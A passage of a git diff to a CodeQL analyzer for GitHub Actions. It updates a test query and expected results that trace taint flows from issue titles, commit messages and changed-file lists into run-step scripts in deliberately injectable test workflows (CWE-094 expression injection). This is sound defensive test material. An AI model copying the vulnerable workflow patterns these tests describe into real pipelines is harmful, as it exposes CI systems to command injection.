| runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | cfgNodes -dfNodes -exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations -| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | scopes | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -322,8 +345,8 @@ summaries | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | calls -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index abdd087590a3..f30db9af92fe 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,4 @@ -import codeql.actions.ast.internal.Actions +import codeql.actions.ast.internal.Yaml import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow @@ -15,29 +15,29 @@ query predicate stepNodes(Step s) { any() } query predicate allUsesNodes(Uses s) { any() } -query predicate stepUsesNodes(StepUses s) { any() } +query predicate stepUsesNodes(UsesStep s) { any() } -query predicate jobUsesNodes(JobUses s) { any() } +query predicate jobUsesNodes(UsesStep s) { any() } query predicate usesSteps(Uses call, string argname, Expression arg) { - call.getArgumentExpr(argname) = arg + call.getArgument(argname) = arg } -query predicate runSteps(Run run, string body) { run.getScript() = body } +query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() } +query predicate cfgNodes(Cfg::Node n) { any() } -query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() } +query predicate dfNodes(DataFlow::Node e) { any() } query predicate exprNodes(DataFlow::Node e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate usesIds(StepUses s, string a) { s.getId() = a } +query predicate usesIds(UsesStep s, string a) { s.getId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index d31268b12b59..51fb93146859 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | | action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 23369932e819..7bea4429e562 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | -| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files | -| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 8ec7f44dba3d..6496731dd6bf 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8e19cd469ab9..8d091b655479 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | nodes | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index f7d715c9fa1a..ae21052dcfe2 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,15 +1,15 @@ edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 55075b7baf3b..dacd31cf91c9 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | 